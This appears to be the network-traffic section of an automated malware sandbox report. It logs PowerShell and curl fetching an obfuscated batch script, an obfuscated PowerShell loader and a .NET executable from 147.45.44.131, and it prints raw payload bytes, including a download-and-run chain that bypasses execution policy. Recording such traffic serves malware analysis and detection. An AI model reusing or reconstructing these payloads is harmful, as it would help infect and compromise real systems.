                                                                          Jan 7, 2025 06:15:50.880914927 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:50.881001949 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:50.885832071 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:16:05.591511011 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:16:05.596455097 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:16:05.598599911 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:16:05.603569984 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:16:05.922183990 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:16:05.976474047 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:16:06.060142040 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:16:06.066159964 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:16:06.070966959 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:16:06.074600935 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:16:06.079395056 CET44494974294.130.22.61192.168.2.6
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 7, 2025 06:12:28.063508987 CET5360840162.159.36.2192.168.2.6
                                                                          Jan 7, 2025 06:12:28.550756931 CET6208053192.168.2.61.1.1.1
                                                                          Jan 7, 2025 06:12:28.557905912 CET53620801.1.1.1192.168.2.6
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Jan 7, 2025 06:12:28.550756931 CET192.168.2.61.1.1.10x674cStandard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Jan 7, 2025 06:12:28.557905912 CET1.1.1.1192.168.2.60x674cName error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                          Jan 7, 2025 06:13:15.072073936 CET1.1.1.1192.168.2.60x383No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                          Jan 7, 2025 06:13:15.072073936 CET1.1.1.1192.168.2.60x383No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                          • 147.45.44.131
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.649709147.45.44.131804980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 7, 2025 06:11:58.761396885 CET278OUTGET /infopage/wertxcp.bat HTTP/1.1
                                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                          Host: 147.45.44.131
                                                                          Connection: Keep-Alive
                                                                          Jan 7, 2025 06:11:59.393201113 CET1236INHTTP/1.1 200 OK
                                                                          Date: Tue, 07 Jan 2025 05:11:59 GMT
                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                          Last-Modified: Mon, 06 Jan 2025 15:17:28 GMT
                                                                          ETag: "1760-62b0b206762ae"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 5984
                                                                          Keep-Alive: timeout=5, max=100
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-msdos-program
                                                                          Data Raw: 40 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 74 e7 81 af 25 65 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 63 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 68 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 6f 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 20 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 6f 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 66 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 66 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 0d 0a 73 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 65 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 74 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 6c 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 6f 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 63 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 61 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 6c 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 0d 0a 0d 0a 73 25 e1 83 9a [TRUNCATED]
                                                                          Data Ascii: @%U`t%e%U`%c%U`%h%U`%o%U`% %U`%o%U`%f%U`%f%U`%s%U`%e%U`%t%U`%l%U`%o%U`%c%U`%a%U`%l%U`%s%U`%e%U`%t%U`% %U`%"%U`%u%U`%r%U`%l%U`%=%U`%h%U`%t%U`%t%U`%p%U`%:%U`%/%U`%/%U`%1%U`%4%U`%7%U`%.%U`%4%U`%5%U`%.%U`%4%U`%4%U`%.%U`%1%U`%3%U`%1%U`%/%U`%i%U`%n%U
                                                                          Jan 7, 2025 06:11:59.393217087 CET1236INData Raw: 60 d5 a9 d5 a1 d5 a4 d4 be 25 66 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 6f 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 70 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 61 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5
                                                                          Data Ascii: `%f%U`%o%U`%p%U`%a%U`%g%U`%e%U`%/%U`%s%U`%f%U`%x%U`%q%U`%r%U`%.%
                                                                          Jan 7, 2025 06:11:59.393228054 CET1236INData Raw: e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 65 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 3d 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 71 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 49 25 e1 83 9a 55 e2 92 96 60 d5 a9
                                                                          Data Ascii: `%e%U`%=%U`%q%U`%I%U`%n%U`%x%U`%8%U`%F%U`%3%U`%t%U`%u%U`%J%U`%D%
                                                                          Jan 7, 2025 06:11:59.393238068 CET1236INData Raw: 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 6e 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 68 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 6d 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 70 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5
                                                                          Data Ascii: `%n%U`%h%U`%m%U`%p%U`%z%U`%F%U`%b%U`%2%U`%G%U`%Y%U`%q%U`%P%U`%i%
                                                                          Jan 7, 2025 06:11:59.393250942 CET1236INData Raw: d5 a1 d5 a4 d4 be 25 72 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 6f 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 66 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 69 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be
                                                                          Data Ascii: %r%U`%o%U`%f%U`%i%U`%l%U`%e%U`% %U`%-%U`%E%U`%x%U`%e%U`%c%U`%u%U
                                                                          Jan 7, 2025 06:11:59.393260002 CET109INData Raw: 60 d5 a9 d5 a1 d5 a4 d4 be 25 6c 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 6f 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 63 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5 a4 d4 be 25 61 25 e1 83 9a 55 e2 92 96 60 d5 a9 d5 a1 d5
                                                                          Data Ascii: `%l%U`%o%U`%c%U`%a%U`%l%U`%


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.649710147.45.44.131806684C:\Windows\System32\curl.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 7, 2025 06:11:59.766478062 CET195OUTGET /infopage/sfxqr.ps1 HTTP/1.1
                                                                          Host: 147.45.44.131
                                                                          User-Agent: curl/7.83.1
                                                                          Accept: */*
                                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                          Jan 7, 2025 06:12:00.416176081 CET1236INHTTP/1.1 200 OK
                                                                          Date: Tue, 07 Jan 2025 05:12:00 GMT
                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                          Last-Modified: Mon, 06 Jan 2025 15:15:53 GMT
                                                                          ETag: "5cf6-62b0b1ac1f4e5"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 23798
                                                                          Data Raw: 0d 0a 24 35 6f 69 62 52 5a 53 79 7a 6f 6f 4f 50 77 67 65 6e 62 33 48 34 79 73 4e 55 55 6c 55 38 41 31 49 4c 55 51 75 68 66 75 59 6e 65 33 33 62 6e 35 4e 56 57 79 54 6d 76 49 48 35 56 48 36 78 37 30 7a 78 67 43 35 67 76 36 49 71 66 65 61 34 7a 77 72 59 59 39 6c 4c 68 66 61 4c 4a 7a 4d 59 78 6c 71 6e 45 46 34 6b 41 72 6a 61 70 6d 48 52 72 4d 46 6a 5a 69 5a 37 50 6e 50 42 6d 74 58 35 75 75 33 33 79 77 7a 75 31 48 59 71 5a 4c 66 34 58 4a 64 37 75 6e 38 50 4d 73 59 62 30 33 37 52 54 6f 70 35 74 4e 63 35 57 56 72 53 4a 73 68 45 48 55 6e 64 50 61 4c 48 77 6f 72 46 59 59 34 37 4a 47 58 76 66 6b 4c 4b 71 69 6b 59 35 71 46 65 4b 55 55 66 51 65 43 33 63 69 49 45 66 58 68 37 62 75 4a 43 55 77 6a 67 4a 63 78 71 7a 77 4c 47 69 4e 34 44 45 59 71 6f 45 64 53 36 62 47 6f 54 42 6e 37 4b 67 43 4a 59 76 78 56 78 72 56 44 71 57 43 67 53 63 64 33 43 44 65 37 31 64 6d 45 43 79 64 6f 4d 79 42 6a 67 45 67 53 51 43 33 37 74 5a 6d 6a 5a 6b 57 30 69 74 35 47 43 45 53 35 49 73 54 39 4e 71 31 31 56 64 39 4e 36 4b 6d 39 4b 68 4f [TRUNCATED]
                                                                          Data Ascii: $5oibRZSyzooOPwgenb3H4ysNUUlU8A1ILUQuhfuYne33bn5NVWyTmvIH5VH6x70zxgC5gv6Iqfea4zwrYY9lLhfaLJzMYxlqnEF4kArjapmHRrMFjZiZ7PnPBmtX5uu33ywzu1HYqZLf4XJd7un8PMsYb037RTop5tNc5WVrSJshEHUndPaLHworFYY47JGXvfkLKqikY5qFeKUUfQeC3ciIEfXh7buJCUwjgJcxqzwLGiN4DEYqoEdS6bGoTBn7KgCJYvxVxrVDqWCgScd3CDe71dmECydoMyBjgEgSQC37tZmjZkW0it5GCES5IsT9Nq11Vd9N6Km9KhOb1CpbcnGc34gbwkJit3tCiuO5kI4XH55f01EGD1hkkY7a6ibVBEQRxL2Gxt1TssV89Bk4gDf1WJcJxy9CqiWCposo88STAN11D9b57gz7jY4nstT9uynJVSTUT66iuL1JSkGxWDEJtZdQuE5OoSiLkrfupGmBkQMXgvVInfmqudZ6zCkOAr3cnqjkEVHPb = 'qjOH2>27sLy#gHVq*uncB#b32!O3DVcbSz%(31WskOH354ShWlfk1ECzHga%6_3X4Wt3PZ8PY*%85t>>s2go@$vOwP9Xad7lh5>iLkS)zPM7LP*khcWEoPh#xfG_ll@*Ica_vm9Hjj!w1!CgUZ@=H3=SXH71eShOaRy4@*!(pOqEa7L9cv1Mv$8afIxn0HzQCwWkLTrak^e^N%$m)>Z4nUoieXZ2TXQhlZB0lwxIEbx2j^NmRLq23(y4H9F9*@GNy)e9$MAWWQ0Mt8_kK8kH3kzpxTtyq!OOUkDmlZvEKUgmQlKV9qz'$i0MpHo12TBH7rNYIx2QIx6JuBysYGI2Xdd3dFMLUdKC82jP1k9xMks3mqcoT5dwLIteOT5Dkr5on3L1bi1xGUqxujRwmi1ZAY1zIEAho6MfoEQsflMuDpp1c6upCJaCzgnPCWtWiUIKHLJpSjQBVHVUsAWMUVeffKpHaBpJ10 [TRUNCATED]
                                                                          Jan 7, 2025 06:12:00.416213036 CET1236INData Raw: 43 39 68 43 4d 7a 6e 6f 37 66 42 4f 52 33 47 4a 66 35 6d 78 4d 51 46 5a 50 39 42 6d 46 64 37 36 48 65 6e 4b 54 78 39 33 33 31 77 76 75 30 45 6b 76 50 4b 77 69 67 55 76 34 48 77 4d 78 41 69 64 69 46 48 78 50 36 30 73 35 74 33 56 65 54 6f 59 35 62
                                                                          Data Ascii: C9hCMzno7fBOR3GJf5mxMQFZP9BmFd76HenKTx9331wvu0EkvPKwigUv4HwMxAidiFHxP60s5t3VeToY5b00SLXlJ1PLAxF2SSNptQUzZc0zm9RlcYRWKsKWrgoYrorInACMF9poHBbzVi8JkosmgtskH07Nm5HvvrLl6FfdsmOIRUBJheyD5Em4ScEOCcBL4pEnWXNeIP33ekTwzypIHE0rFRTeARaQkDOlQXwJQT4pKsZrJRY
                                                                          Jan 7, 2025 06:12:00.416224003 CET1236INData Raw: 51 34 74 73 50 54 4a 43 7a 58 65 30 70 6e 72 61 6b 77 38 34 38 55 64 61 6b 36 4e 35 44 6b 6f 39 59 50 46 4d 70 6a 6d 68 30 43 72 62 66 6f 30 5a 49 44 52 58 58 71 4f 35 61 54 49 54 46 4f 39 4f 74 66 62 5a 68 66 76 41 4a 61 45 36 6e 43 34 36 46 79
                                                                          Data Ascii: Q4tsPTJCzXe0pnrakw848Udak6N5Dko9YPFMpjmh0Crbfo0ZIDRXXqO5aTITFO9OtfbZhfvAJaE6nC46Fyw9SQmrBKvWbTcmDcs9Ma1nSQO6mSSYYMNRbA6c3tYXtZjz8c3KT4tp7JqBCpFt1X7OFLLCgQGdCd43rY8KYIFediTRT4aNoogWbUtxR0oDyQmdOwUnr5UtRcvh13tl02zX7ibWpK2ieBqN5 = '2r0mAlBPkJaP5H
                                                                          Jan 7, 2025 06:12:00.416234970 CET1236INData Raw: 4a 75 4f 46 5a 48 43 43 4d 76 4c 6a 6b 4f 4a 42 56 77 43 47 67 32 44 52 51 66 50 56 49 48 4a 41 38 32 63 44 67 7a 45 69 52 51 4a 56 59 6d 42 6b 5a 63 5a 77 67 6a 4c 79 34 35 44 69 51 56 58 54 39 46 63 6b 77 4c 56 78 4e 55 43 44 4d 69 49 7a 30 4f
                                                                          Data Ascii: JuOFZHCCMvLjkOJBVwCGg2DRQfPVIHJA82cDgzEiRQJVYmBkZcZwgjLy45DiQVXT9FckwLVxNUCDMiIz0OalxwFxBVOxNXEVkMLUEKNQouBCIXRXJMC1cTVAgzOiM8Hi9BbRVqCSENSkp2XjUZCBQjEgYfcC4oIglQE1kdGA0RFVonDjJ/eiE6Gl1AQgcPCywGLyIrJlA+NlAxABlFVS48ARIEJAk9RTI+ClF1K0E9KCAqGhpob
                                                                          Jan 7, 2025 06:12:00.416244984 CET1236INData Raw: 4a 70 41 72 74 6f 50 76 75 67 37 32 30 7a 41 56 79 75 6f 57 30 46 61 6e 36 69 51 4b 4b 4b 72 38 79 43 4e 6d 6a 37 75 56 4c 36 30 72 73 4f 6d 66 65 7a 44 37 34 5a 30 45 4f 57 75 4b 58 46 6b 6a 79 38 44 78 6d 58 76 31 39 54 4b 33 4f 73 35 73 35 76
                                                                          Data Ascii: JpArtoPvug720zAVyuoW0Fan6iQKKKr8yCNmj7uVL60rsOmfezD74Z0EOWuKXFkjy8DxmXv19TK3Os5s5vpVGuDYLIXMMj7GVR3tLz2HDM7lP7zgbCPmaPdD4ple9joZVEh7zLgG2iS4xbJOT1uJUUqGx0yfNYHdiiQLZ1qQfIu16jQcfWKHyeEAXbJ9XB2eayVOL8zbLenMkyJOjV91N9oDdPx8 ($DhkwgsUwE9jM5YHCN5aP
                                                                          Jan 7, 2025 06:12:00.416254997 CET1236INData Raw: 6c 32 69 72 52 35 67 53 46 6c 30 42 39 79 63 44 4e 35 50 43 74 47 59 4b 59 6d 47 67 33 75 36 4b 33 4a 79 54 6b 43 4f 57 78 49 47 73 4a 65 30 79 70 33 5a 67 78 6c 43 65 65 58 53 70 79 39 59 56 70 70 48 30 39 49 64 4b 71 32 50 6c 39 71 42 34 76 53
                                                                          Data Ascii: l2irR5gSFl0B9ycDN5PCtGYKYmGg3u6K3JyTkCOWxIGsJe0yp3ZgxlCeeXSpy9YVppH09IdKq2Pl9qB4vS09VZXRGTzMujiytvDeWAygaOz4WbfyWY3fIY9PS0tpTQaHUa1NmghueUjGkc5pyA0VpDpUvyLgRINKxrk5kRLz1JAyz3o04E1SaEcQvhcyUAdWHZS219FgzAegC0e2JVlNQ4tsPTJCzXe0pnrakw848Udak6N5Dko
                                                                          Jan 7, 2025 06:12:00.416265965 CET1236INData Raw: 53 73 4c 34 64 74 6e 31 58 58 4f 68 35 5a 4d 49 75 67 52 55 61 4d 54 41 66 30 6d 48 37 6d 62 44 6f 77 6c 32 69 72 52 35 67 53 46 6c 30 42 39 79 63 44 4e 35 50 43 74 47 59 4b 59 6d 47 67 33 75 36 4b 33 4a 79 54 6b 43 4f 57 78 49 47 73 4a 65 30 79
                                                                          Data Ascii: SsL4dtn1XXOh5ZMIugRUaMTAf0mH7mbDowl2irR5gSFl0B9ycDN5PCtGYKYmGg3u6K3JyTkCOWxIGsJe0yp3ZgxlCeeXSpy9YVppH09IdKq2Pl9qB4vS09VZXRGTzMujiytvDeWAygaOz4WbfyWY3fIY9PS0tpTQaHUa1NmghueUjGkc5pyA0VpDpUvyLgRINKxrk5kRLz1JAyz3o04E1SaEcQvhcyUAdWHZS219FgzAegC0e2J
                                                                          Jan 7, 2025 06:12:00.416276932 CET1000INData Raw: 4d 53 34 69 4f 71 77 4a 46 78 37 4b 44 6b 72 43 76 34 31 37 76 4b 54 68 6f 78 65 59 30 59 59 56 39 63 30 4e 79 30 6d 69 5a 46 46 35 65 76 68 48 6d 4f 78 35 76 68 57 42 39 57 33 61 4c 59 53 71 59 6c 4b 6b 20 3d 20 5b 43 6f 6e 76 65 72 74 5d 3a 3a
                                                                          Data Ascii: MS4iOqwJFx7KDkrCv417vKThoxeY0YYV9c0Ny0miZFF5evhHmOx5vhWB9W3aLYSqYlKk = [Convert]::FromBase64String($DhkwgsUwE9jM5YHCN5aPgqV78gCvPQwilBzMBDWGDLecwcPebbyuwqTXMmy9qihxMBl3i5BKiULVM2LfRhUxcCv4scAYOXaenqQv1V6gaoLbe8KTbTrIOtVKPqLF5n5L4rrflZn6lyXx0UZ
                                                                          Jan 7, 2025 06:12:00.416287899 CET1236INData Raw: 38 45 32 70 68 73 6f 6b 33 39 4f 41 72 65 78 45 29 0d 0a 20 20 20 20 24 65 4f 34 53 54 69 70 46 58 43 32 51 58 77 6d 6c 64 6b 63 47 7a 4e 62 37 4c 58 41 78 59 68 33 6c 36 58 49 39 32 6d 63 38 71 36 6c 55 41 4b 78 6d 71 46 35 42 72 65 34 51 77 37
                                                                          Data Ascii: 8E2phsok39OArexE) $eO4STipFXC2QXwmldkcGzNb7LXAxYh3l6XI92mc8q6lUAKxmqF5Bre4Qw7G5h2q0JRT9nms1Iea2mG6BjYHTm13cd2N5fgaxQvLs1y8DWD2NDBnqAFVJvXORY0gvZxVmDmm15NKvZD6i9pZbOg4aKQC2g3UASNnisQJaZwux5juraqSsbEh235bwktUB3JdMaXzsg8CbwGelgVc0lljNpvpxzW0
                                                                          Jan 7, 2025 06:12:00.416299105 CET1236INData Raw: 70 6d 6d 57 52 67 70 35 72 58 62 7a 4e 4d 45 67 77 39 62 4a 49 33 66 50 36 37 48 31 39 73 52 38 42 47 35 47 4f 64 41 4d 62 53 55 44 79 59 76 63 4b 62 30 64 66 6e 41 76 48 58 5a 55 59 79 36 38 47 64 78 48 51 37 52 53 38 4f 73 7a 69 63 61 69 4d 70
                                                                          Data Ascii: pmmWRgp5rXbzNMEgw9bJI3fP67H19sR8BG5GOdAMbSUDyYvcKb0dfnAvHXZUYy68GdxHQ7RS8OszicaiMpqh2xcXGJ91EqymVV6VkoMNKieQ5KMo60HtHZGTAZAG8aNSaFdNfE7icdXUSMc57U4NiFf6PnULnFPtUM00r9I13jQoCwAy7EJngAtVjh72tw4WOn9FVlO7MCU8y14cmgNi6mMUdeRJBPIHo3aYw4cV0LaequhsmeQ
                                                                          Jan 7, 2025 06:12:00.421998978 CET1236INData Raw: 70 41 62 68 43 30 38 47 72 59 74 75 53 70 4b 4f 6e 6c 32 55 71 77 69 4a 78 61 59 46 41 4d 49 73 38 33 33 63 38 68 38 49 36 48 4e 5a 47 4b 38 57 77 45 48 32 44 43 53 33 62 53 75 6d 63 33 47 65 51 41 77 5a 77 72 51 46 6e 75 58 6a 6a 49 43 6d 62 43
                                                                          Data Ascii: pAbhC08GrYtuSpKOnl2UqwiJxaYFAMIs833c8h8I6HNZGK8WwEH2DCS3bSumc3GeQAwZwrQFnuXjjICmbCT5FPo6kAAqxWpDBsJFYjjEyBPTosTSPHKakKZAVzyvrjSQEUi196O2cOHDAVS1qsbqLOd0SJtiuyXOt8OUKcTS2S8VDW99h6F9IlF01 = 0; $8Lci5gxfX8B0ZKrOeTXAekl95aSCo1ducxggqJObYO6yvZnlDgr


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.649712147.45.44.131804016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 7, 2025 06:12:02.247064114 CET181OUTGET /infopage/grwsx.exe HTTP/1.1
                                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                          Host: 147.45.44.131
                                                                          Connection: Keep-Alive
                                                                          Jan 7, 2025 06:12:02.892477036 CET1236INHTTP/1.1 200 OK
                                                                          Date: Tue, 07 Jan 2025 05:12:02 GMT
                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                          Last-Modified: Mon, 06 Jan 2025 15:14:03 GMT
                                                                          ETag: "8a00-62b0b14360f58"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 35328
                                                                          Keep-Alive: timeout=5, max=100
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-msdos-program
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 71 e2 4e b4 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 80 00 00 00 08 00 00 00 00 00 00 86 9f 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9f 00 00 4f 00 00 00 00 a0 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 18 9f 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELqN"0 @ `4O H.text `.rsrc@@.reloc@BhH!`}0H(oi+%a ]ai]Xi]Xi2*0(((o*(*0rpssor>sp~(o&or`sp~(o&o%~(oorsp~(orsp~(oo&*(*(*(*(*j(
                                                                          Jan 7, 2025 06:12:02.892502069 CET1236INData Raw: 0a 72 ce 73 00 70 28 11 00 00 0a 6f 12 00 00 0a 80 01 00 00 04 2a 42 53 4a 42 01 00 01 00 00 00 00 00 0c 00 00 00 76 34 2e 30 2e 33 30 33 31 39 00 00 00 00 05 00 6c 00 00 00 34 03 00 00 23 7e 00 00 a0 03 00 00 34 04 00 00 23 53 74 72 69 6e 67 73
                                                                          Data Ascii: rsp(o*BSJBv4.0.30319l4#~4#Stringst#US{#GUID{t#BlobW3PPpp
                                                                          Jan 7, 2025 06:12:02.892524958 CET1236INData Raw: 67 65 74 46 72 61 6d 65 77 6f 72 6b 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 46 69 6c 65 56 65 72 73 69 6f 6e 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 41 74 74 72 69 62 75 74 65 00
                                                                          Data Ascii: getFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAtt
                                                                          Jan 7, 2025 06:12:02.892535925 CET1236INData Raw: 00 66 00 53 00 76 00 6d 00 37 00 57 00 43 00 76 00 34 00 53 00 52 00 70 00 4f 00 62 00 34 00 38 00 65 00 58 00 76 00 30 00 65 00 58 00 55 00 37 00 71 00 4f 00 4a 00 67 00 72 00 47 00 69 00 74 00 64 00 47 00 46 00 6a 00 2f 00 62 00 35 00 33 00 63
                                                                          Data Ascii: fSvm7WCv4SRpOb48eXv0eXU7qOJgrGitdGFj/b53cyqxtnVrLOrwufk+fzmndGA8OzIq6K99snS0vOGjt3Ys/nKjor5xNuD16HYzcXhy9XVzp6clbaB753Iiz
                                                                          Jan 7, 2025 06:12:02.892546892 CET896INData Raw: 00 69 00 4d 00 42 00 67 00 52 00 48 00 53 00 30 00 39 00 45 00 30 00 5a 00 57 00 4d 00 4b 00 4f 00 38 00 72 00 4f 00 65 00 64 00 72 00 63 00 72 00 71 00 6c 00 37 00 69 00 42 00 74 00 49 00 53 00 47 00 76 00 70 00 76 00 74 00 39 00 39 00 54 00 38
                                                                          Data Ascii: iMBgRHS09E0ZWMKO8rOedrcrql7iBtISGvpvt99T8/fHB0ffwpa3Z543/ze3YsMTI6t27y6enqZmEqPrMytvf1MLB8aLhz8r0peS0t4nUy8jD/b6VvvKlqZmJ
                                                                          Jan 7, 2025 06:12:02.892556906 CET1236INData Raw: 00 6e 00 38 00 76 00 6a 00 39 00 79 00 2f 00 7a 00 66 00 6b 00 4f 00 76 00 69 00 2b 00 63 00 58 00 4b 00 2b 00 4e 00 58 00 68 00 7a 00 4d 00 61 00 43 00 72 00 70 00 54 00 72 00 75 00 59 00 57 00 57 00 75 00 34 00 2b 00 43 00 75 00 4b 00 6d 00 47
                                                                          Data Ascii: n8vj9y/zfkOvi+cXK+NXhzMaCrpTruYWWu4+CuKmGtIe/rtvu+/z66u77z/L82qnf2tHF9tDRnre6hUkaWXdyTB1cfH9DEFULMyoYLBE6Hyw1NysTH0BHYHNT
                                                                          Jan 7, 2025 06:12:02.892563105 CET1236INData Raw: 00 62 00 57 00 33 00 70 00 34 00 2b 00 61 00 6a 00 5a 00 53 00 51 00 6b 00 70 00 32 00 53 00 69 00 71 00 61 00 2b 00 6e 00 6f 00 43 00 4c 00 6a 00 72 00 54 00 61 00 69 00 49 00 53 00 32 00 6c 00 65 00 7a 00 35 00 76 00 5a 00 79 00 6c 00 35 00 49
                                                                          Data Ascii: bW3p4+ajZSQkp2Siqa+noCLjrTaiIS2lez5vZyl5ISf1tKpvZnaisiI4pTi3/X4mry8tJO9vIKHxOLVxuDOqYOD7Ob20efYhd/93Inz0fjp4LTwkszJ4vTErZ
                                                                          Jan 7, 2025 06:12:02.892569065 CET1236INData Raw: 00 48 00 51 00 55 00 34 00 78 00 58 00 53 00 35 00 76 00 55 00 6b 00 4a 00 74 00 51 00 6b 00 5a 00 2b 00 4a 00 57 00 4d 00 30 00 66 00 53 00 5a 00 45 00 55 00 44 00 39 00 46 00 59 00 6b 00 6b 00 36 00 51 00 6b 00 56 00 64 00 6f 00 5a 00 4f 00 7a
